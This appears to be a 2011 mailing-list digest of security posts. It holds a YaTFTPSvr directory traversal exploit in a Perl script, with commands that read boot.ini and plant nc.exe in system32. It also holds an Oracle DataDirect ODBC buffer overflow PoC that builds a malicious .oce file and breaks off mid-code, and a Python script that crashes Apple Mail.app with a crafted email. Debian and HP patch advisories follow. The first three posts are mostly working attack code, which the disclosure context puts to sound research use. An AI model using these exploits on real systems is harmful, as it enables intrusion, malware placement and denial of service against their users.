YaTFTPSvr TFTP Server Directory Traversal Vulnerability
Title: YaTFTPSvr TFTP Server Directory Traversal Vulnerability Software : YaTFTPSvr TFTP Server Software Version : 1.0.1.200 Vendor: http://sites.google.com/site/zhaojieding2/ Vulnerability Published : 2011-07-11 Vulnerability Update Time : Status : Impact : Medium Bug Description : YaTFTPSvr TFTP Server does not properly sanitise filenames containing directory traversal sequences that are received from an TFTP client. Proof Of Concept : After installing YaTFTPSvr in C drive, and set some pretreatment: #!/usr/bin/perl -w $|=1; $target_ip=shift || die "usage: $0 \$target_ip\n"; @directory_traversal=( '..\tmp.txt', '..\..\tmp.txt', '..\..\..\tmp.txt', '..\..\..\..\tmp.txt', '..\..\..\..\..\tmp.txt', '..\..\..\..\..\..\tmp.txt', '..\..\..\..\..\..\..\tmp.txt' ); open(TMP, ">tmp.txt"); print TMP "tmp"; close(TMP); foreach $dt_content (@directory_traversal){ $dt_it=`tftp.exe $target_ip put tmp.txt $dt_content`; print "command : tftp.exe $target_ip put tmp.txt $dt_content\n"; print "$dt_it"; if($dt_it=~m/^Transferred successfully/){ print "Directory Traversal PAYLOAD is $dt_content.\n"; print "Press [ENTER] Button to continue...\n"; ; } sleep(3); } print "Finish!\n"; exit(0); Exploit : #get sensitive file c:\windows\system32>tftp [VICTIM_IP] get ../../boot.ini boot.ini #put malware c:\windows\system32>tftp [VICTIM_IP] put nc.exe ../../WINDOWS/system32/nc.exe Credits : This vulnerability was discovered by demonalex(at)163(dot)com Pentester/Researcher Dark2S Security Team/PolyU.HK
Oracle DataDirect ODBC Drivers HOST Attribute arsqls24.dll Stack Based Buffer Overflow PoC (*.oce)
http://retrogod.altervista.org/9sg_oracle_datadirect.htm http://www.exploit-db.com/exploits/18007/ This poc will create a suntzu.oce file which should work against Hyperion Interactive Reporting Studio which is delivered with Oracle Hyperion Suite. When clicked a login box appears, on clicking OK an error message also appears then error then... boom! description for .oce : Interactive Reporting database connection file file association: "C:\Oracle\Middleware3\EPMSystem11R1\products\biplus\\bin\\brioqry.exe" "%1" crash dump, eip and seh overwritten, unicode expanded, I suppose one should be able to deal with it : (208.152c): Access violation - code c005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=008b ebx= ecx=0e752eb8 edx=0f49 esi=0e6b3d60 edi=0012a338 eip=00410043 esp=0012a2d8 ebp=0012a2ec iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010286 brioqry+0x10043: 00410043 0152ff add dword ptr [edx-1],edx ds:0023:0f48= 0:000> g (208.152c): Access violation - code c005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=008b ebx= ecx=00410041 edx=7c8285f6 esi= edi= eip=00410043 esp=00129f10 ebp=00129f30 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010286 brioqry+0x10043: 00410043 0152ff add dword ptr [edx-1],edx ds:0023:7c8285f5=244c8b00 */ function _x($x){ global $buff; list($x) = array_values(unpack('V', $x)); $x = $x + strlen($buff); $x = pack('V',$x); return $x; } $buff = "mydatabase.com". str_repeat("\x20",16). //cosmetics, no ... inside the login box str_repeat("\x41",4000); //$dsn="DRIVER=DataDirect 6.0 Greenplum Wire Protocol;HOST=;IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null;"; //$dsn="DRIVER=DataDirect 6.0 MySQL Wire Protocol;HOST=;IP=127.0.0.1;PORT=9;DB=DATA;UID=sa;PWD=null"; $dsn="DRIVER=DataDirect 6.0 PostgreSQL Wire Protocol;HOST=;UID=system;PWD=X;"; while (!(strlen($dsn)==166)){ //fill the gap $dsn.="\x20"; } $dsn=str_replace("HOST=;","HOST=".$buff.";",$dsn); $dump= "#BRIF\x20BIN001". "\x00\x00\x00\x00". _x("\x7b\x07\x00\x00"). //header length, increase counter "\x37\x00\x00\x00". //path length "D:\\Documents\x20and\x20Settings\\Admin\\Desktop\\Predefinito.oce". "\x01\x00\x01\x00". "\x00\x00\x07\x00". "\x00\x00\x0a\x00". "\x00\x00". _x("\xa6\x00\x00\x00"). //dsn length $dsn. "\x00\x00\x00\x00". "\x00\x00\x00\x00". "\x04\x00\x00\x00". "True". "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x01\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x04\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\r\x00\x00\x00". "ColItem.Table". "\x01\x00". "\x00\x00\x04\x00\x00\x00\x12\x00\x00\x00". "ColItem.TableAlias". "\x01\x00\x00\x00\x10\x00". "\x00\x00\r\x00\x00\x00". "ColItem.Owner". "\x01\x00\x00\x00\x1c\x00\x00\x00\x0c\x00\x00". "\x00". "ColItem.Type". "\x01\x00\x00\x00(\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00". "Source". "\x01\x00\x00\x00\x05\x00\x00\x004\x00\x00\x00\x05\x00\x00\x00". "Where". "\x01". "\x00\x00\x00\x05\x00\x00\x008\x00\x00\x00\x07\x00\x00\x00". "OrderBy". "\x01\x00". "\x00\x00\x05\x00\x00\x00<\x00\x00\x00|\x00\x00\x00\x04\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x09\x00\x00\x00\x0c\x00\x00\x00ColItem.Name\x01\x00\x00\x00". "\x04\x00\x00\x00\x10\x00\x00\x00". "ColItem.ColAlias". "\x01\x00\x00\x00\x10\x00\x00\x00". "\x0e\x00\x00\x00". "ColItem.ColNum". "\x01\x00\x00\x00\x1c\x00\x00\x00\x0f\x00\x00\x00". "ColItem.ColType". "\x01\x00\x00\x00(\x00\x00\x00\x10\x00\x00\x00". "ColItem.NumBytes". "\x01\x00\x00\x004\x00". "\x00\x00\x0e\x00\x00\x00". "ColItem.Places". "\x01\x00\x00\x00@\x00\x00\x00\x0e\x00\x00". "\x00". "ColItem.Digits". "\x01\x00\x00\x00L\x00\x00\x00\r\x00\x00\x00". "ColItem.Nulls". "\x01\x00\x00\x00X\x00". "\x00\x00\x12\x00\x00\x00". "ColItem.NativeType". "\x01
Apple's Mail.app mail of death
OVERVIEW Mail.app mail client is vulnerable to a DoS by sending a crafted email. VENDOR Apple Inc. Vendor contacted: 25 July 2011 Vendor reply: 20 September 2011. Vendor's actions: Details confidential. VULNERABILITY DESCRIPTION Send an email with > 2023 MIME attachments to the vicim client. Upon parsing the attachments, the mail client crashes. Impact: DoS Type: Remote, by sending a crafted email. Buffer overflow on parsing MIME attachments. Result: Mail.app crashes upon parsing the attachments, and produces a crash report. Client leaves email on mail server, so it crashes again on the same mail at next startup. Difficulty: I can teach it my mother. VULNERABLE VERSIONS - All versions up to Mac OS X 10.7.2 on Intel. (Mail.app version 5.1) - At least the mail client on IOS 4.2.x, 4.3.3. (IOS 5.x untested) - Not vulnerable: Leopard on PPC SOLUTION ... MITIGATION Some spam cleaners are capable of limiting the number of attachments. CREDITS shebang42 PROOF OF CONCEPT CODE #!/usr/bin/env python # Mail of death for Apple's Mail.app # # Tested & vulnerable: Leopard/Intel, Snow Leopard, Lion (up to 10.7.2), IOS 4.2.x, 4.3.3 # Tested != vulnerable: Leopard/PPC # Create mail with n_attach MIME attachments # Version 1.0; shebang42 import smtplib n_attach=2040 # ~2024 is sufficient relay='your.mta.goes.here' mailfrom = 'mail_of_de...@example.com' mailto = mailfrom subject = 'PoC Apple Mail.app mail of death' date = 'October 29, 2011 10:00:00 GMT' def craft_mail(): header = 'From: %s\nTo: %s\nSubject: %s\nDate: %s\nContent-Type: multipart/mixed ; boundary="delim"\n\n' % (mailfrom, mailto, subject, date) body = '--delim\nContent-Type: text/plain\nContent-Disposition: inline\n\nHello World\nBye Mail.app\n\n\n' attach = '--delim\nContent-Disposition: inline\n\n'*n_attach ### Another, slightly longer option to crash Mail.app (same bug) # attach = '--delim\nContent-Type: text/plain\nContent-Disposition: attachment; filename=\n\ncontent\n'*n_attach return header + body + attach def send_mail(mail): server = smtplib.SMTP(relay) server.sendmail(mailfrom, mailto, mail) server.quit() mail=craft_mail() #print mail send_mail (mail)
[SECURITY] [DSA 2333-1] phpldapadmin security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA-2333-1secur...@debian.org http://www.debian.org/security/ Jonathan Wiltshire Oct 31th, 2011 http://www.debian.org/security/faq - -- Package: phpldapadmin Vulnerability : several Problem type : remote Debian-specific: no Debian bug : 646754 CVE IDs: CVE-2011-4075 CVE-2011-4074 Two vulnerabilities have been discovered in phpldapadmin, a web based interface for administering LDAP servers. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2011-4074 Input appended to the URL in cmd.php (when "cmd" is set to "_debug") is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. CVE-2011-4075 Input passed to the "orderby" parameter in cmd.php (when "cmd" is set to "query_engine", "query" is set to "none", and "search" is set to e.g. "1") is not properly sanitised in lib/functions.php before being used in a "create_function()" function call. This can be exploited to inject and execute arbitrary PHP code. For the oldstable distribution (lenny), these problems have been fixed in version 1.1.0.5-6+lenny2. For the stable distribution (squeeze), these problems have been fixed in version 1.2.0.5-2+squeeze1. For the testing distribution (wheezy), these problems will be fixed soon. For the unstable distribution (sid), these problems have been fixed in version 1.2.0.5-2.1. We recommend that you upgrade your phpldapadmin packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk6tQ0EACgkQHYflSXNkfP+uCQCeMmNGTEsYJURFndG0Vj7LAicH qhMAnili/N36OYURQYkY/Bbd873EtlLm =8Zwg -END PGP SIGNATURE-
[SECURITY] [DSA 2332-1] python-django security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2332-1 secur...@debian.org http://www.debian.org/security/ Thijs Kinkhorst October 29, 2011 http://www.debian.org/security/faq - - Package: python-django Vulnerability : several issues Problem type : remote Debian-specific: no CVE ID : CVE-2011-4136 CVE-2011-4137 CVE-2011-4138 CVE-2011-4139 CVE-2011-4140 Debian Bug : 641405 Paul McMillan, Mozilla and the Django core team discovered several vulnerabilities in Django, a Python web framework: CVE-2011-4136 When using memory-based sessions and caching, Django sessions are stored directly in the root namespace of the cache. When user data is stored in the same cache, a remote user may take over a session. CVE-2011-4137, CVE-2011-4138 Django's field type URLfield by default checks supplied URL's by issuing a request to it, which doesn't time out. A Denial of Service is possible by supplying specially prepared URL's that keep the connection open indefinately or fill the Django's server memory. CVE-2011-4139 Django used X-Forwarded-Host headers to construct full URL's. This header may not contain trusted input and could be used to poison the cache. CVE-2011-4140 The CSRF protection mechanism in Django does not properly handle web-server configurations supporting arbitrary HTTP Host headers, which allows remote attackers to trigger unauthenticated forged requests. For the oldstable distribution (lenny), this problem has been fixed in version 1.0.2-1+lenny3. For the stable distribution (squeeze), this problem has been fixed in version 1.2.3-3+squeeze2. For the testing (wheezy) and unstable distribution (sid), this problem has been fixed in version 1.3.1-1. We recommend that you upgrade your python-django packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iQEcBAEBAgAGBQJOq5QOAAoJEOxfUAG2iX573FoH/3Ld4NEmMPQlRW9JmB3AAdsU BjvYcbABkPRbQRJeIN9VAEF5+O0qxNjl7FjEfDXAjJ3iunxje4saddw2D/JLmH6J I5Qmj2hKOXrnOnG6rPJHZDhc33023fVBCLqOekOIfukkDz7ShWwKglmzTHbzhJLr cibWsHZc+7l583d3Q8pPR5CfVmFUGq9d+SO0E3Tp+r5iBOhT7KlHt+txTQ9Ir3UQ u2cIo3LjEsyVjcsYTnfLSUANYnMLZqdROm/2GkSJlvrJFY2yac9T9eWAqLM4TrX3 eGjbNSWu6Zknd0o3VBlPuqVTxBDz3Wje0k9Rg7XcO/54+stIKo1VTTZ+3+No0bU= =xhY3 -END PGP SIGNATURE-
[security bulletin] HPSBUX02707 SSRT100626 rev.2 - HP-UX Apache Web Server, Remote Denial of Service (DoS)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03025215 Version: 2 HPSBUX02707 SSRT100626 rev.2 - HP-UX Apache Web Server, Remote Denial of Service (DoS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2011-09-26 Last Updated: 2011-10-26 - Potential Security Impact: Remote Denial of Service (DoS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP-UX Apache Web Server. This vulnerability could be exploited remotely to create a Denial of Service (DoS). References: CVE-2011-0419, CVE-2011-3192, CVE-2011-3348 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.23, B.11.31 running HP-UX Apache Web Server Suite v3.18 containing Apache v2.2.15.08 or earlier BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2011-0419(AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2011-3192(AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8 CVE-2011-3348(AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has provided the following software updates to resolve this vulnerability. The updates are available for download from the following location https://h20392.www2.hp.com/portal/swdepot/try.do?productNumber=HPUXWSATW319 HP-UX Web Server Suite (WSS) v3.19 containing Apache v2.2.15.09 HP-UX 11i Releases Apache Depot name B.11.23 B.11.31 (32-bit) / HPUXWS22ATW-B319-32.depot B.11.23 B.11.31 (64-bit) / HPUXWS22ATW-B319-64.depot MANUAL ACTIONS: Yes - Update Install HP-UX Web Server Suite v3.19 containing v2.2.15.09 or subsequent. PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa The following text is for use by the HP-UX Software Assistant. AFFECTED VERSIONS HP-UX Web Server Suite v3.19 HP-UX B.11.23 HP-UX B.11.31 == hpuxws22APCH32.APACHE hpuxws22APCH32.APACHE2 hpuxws22APCH32.AUTH_LDAP hpuxws22APCH32.AUTH_LDAP2 hpuxws22APCH32.MOD_JK hpuxws22APCH32.MOD_JK2 hpuxws22APCH32.MOD_PERL hpuxws22APCH32.MOD_PERL2 hpuxws22APCH32.PHP hpuxws22APCH32.PHP2 hpuxws22APCH32.WEBPROXY hpuxws22APCH32.WEBPROXY2 hpuxws22APACHE.APACHE hpuxws22APACHE.APACHE2 hpuxws22APACHE.AUTH_LDAP hpuxws22APACHE.AUTH_LDAP2 hpuxws22APACHE.MOD_JK hpuxws22APACHE.MOD_JK2 hpuxws22APACHE.MOD_PERL hpuxws22APACHE.MOD_PERL2 hpuxws22APACHE.PHP hpuxws22APACHE.PHP2 hpuxws22APACHE.WEBPROXY hpuxws22APACHE.WEBPROXY2 action: install revision B.2.2.15.09 or subsequent END AFFECTED VERSIONS HISTORY Version:1 (rev.1) - 26 September 2011 Initial release Version:2 (rev.2) - 26 October 2011 Final depots available Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2011 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without
[security bulletin] HPSBUX02702 SSRT100606 rev.5 - HP-UX Apache Web Server, Remote Denial of Service (DoS)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c02997184 Version: 5 HPSBUX02702 SSRT100606 rev.5 - HP-UX Apache Web Server, Remote Denial of Service (DoS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2011-09-08 Last Updated: 2011-10-26 -- Potential Security Impact: Remote Denial of Service (DoS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP-UX Apache Web Server. These vulnerabilities could be exploited remotely to create a Denial of Service (DoS). References: CVE-2011-3192, CVE-2011-0419 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.23, B.11.31 running HP-UX Apache Web Server Suite v3.18 containing Apache v2.2.15.08 or earlier HP-UX B.11.11 running HP-UX Apache Web Server Suite v2.33 containing Apache v2.0.64.01 or earlier BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2011-3192(AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8 CVE-2011-0419(AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has provided the following software updates to resolve these vulnerabilities. HP-UX Web Server Suite (WSS) v3.19 containing Apache v2.2.15.09 The WSS v3.19 update is available for download from the following location https://h20392.www2.hp.com/portal/swdepot/try.do?productNumber=HPUXWSATW319 HP-UX 11i Releases / Apache Depot name B.11.23 & B.11.31 (32-bit) / HPUXWS22ATW-B319-32.depot B.11.23 & B.11.31 (64-bit) / HPUXWS22ATW-B319-64.depot HP-UX Web Server Suite (WSS) v2.34 containing Apache v2.0.64.02 The WSS v2.34 update is available for download from the following location https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=HPUXWSATW234 HP-UX 11i Release / Apache Depot name B.11.11 / HPUXWSATW-B234-.depot B.11.23 (32 & 64-bit) / No longer supported. Upgrade to WSS v3.19 B.11.31 (32 & 64-bit) / No longer supported. Upgrade to WSS v3.19 MANUAL ACTIONS: Yes - Update For B.11.23 and B.11.31 install HP-UX Web Server Suite v3.19 or subsequent. For B.11.11 install HP-UX Web Server Suite v2.34 or subsequent. PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa The following text is for use by the HP-UX Software Assistant. AFFECTED VERSIONS HP-UX Web Server Suite v3.19 HP-UX B.11.23 HP-UX B.11.31 == hpuxws22APCH32.APACHE hpuxws22APCH32.APACHE2 hpuxws22APCH32.AUTH_LDAP hpuxws22APCH32.AUTH_LDAP2 hpuxws22APCH32.MOD_JK hpuxws22APCH32.MOD_JK2 hpuxws22APCH32.MOD_PERL hpuxws22APCH32.MOD_PERL2 hpuxws22APCH32.PHP hpuxws22APCH32.PHP2 hpuxws22APCH32.WEBPROXY hpuxws22APCH32.WEBPROXY2 hpuxws22APACHE.APACHE hpuxws22APACHE.APACHE2 hpuxws22APACHE.AUTH_LDAP hpuxws22APACHE.AUTH_LDAP2 hpuxws22APACHE.MOD_JK hpuxws22APACHE.MOD_JK2 hpuxws22APACHE.MOD_PERL hpuxws22APACHE.MOD_PERL2 hpuxws22APACHE.PHP hpuxws22APACHE.PHP2 hpuxws22APACHE.WEBPROXY hpuxws22APACHE.WEBPROXY2 action: install revision B.2.2.15.09 or subsequent HP-UX Web Server Suite v2.34 HP-UX B.11.11 == hpuxwsAPACHE.APACHE hpuxwsAPACHE.APACHE2 hpuxwsAPACHE.AUTH_LDAP hpuxwsAPACHE.AUTH_LDAP2 hpuxwsAPACHE.MOD_JK hpuxwsAPACHE.MOD_JK2 hpuxwsAPACHE.MOD_PERL hpuxwsAPACHE.MOD_PERL2 hpuxwsAPACHE.PHP hpuxwsAPACHE.PHP2 hpuxwsAPACHE.WEBPROXY action: install revision B.2.0.64.02 or subsequent END AFFECTED VERSIONS HISTORY Version:1 (rev.1) - 8 September 2011 Initial release Version:2 (rev.2) - 8 September 2011 Updated affectivity, recommendations, typos Version:3 (rev.3) - 22 September 2011 New source for depots Version:4 (rev.4) - 23 September 2011 Apache WSS 2.33 depot for B.11.11 available Version:5 (rev.5) - 26 October 2011 Final depots available Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jum